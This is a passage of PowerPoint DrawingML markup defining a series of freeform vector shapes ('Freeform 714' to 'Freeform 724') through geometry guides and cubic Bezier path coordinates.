                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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48" name="Freeform 714"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3886" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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49" name="Freeform 715"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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0" name="Freeform 716"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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1" name="Freeform 717"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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2" name="Freeform 718"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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3" name="Freeform 719"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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</a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="hlink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4" name="Freeform 720"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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5" name="Freeform 721"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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6" name="Freeform 722"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3886" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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7" name="Freeform 723"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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8" name="Freeform 724"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3865" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
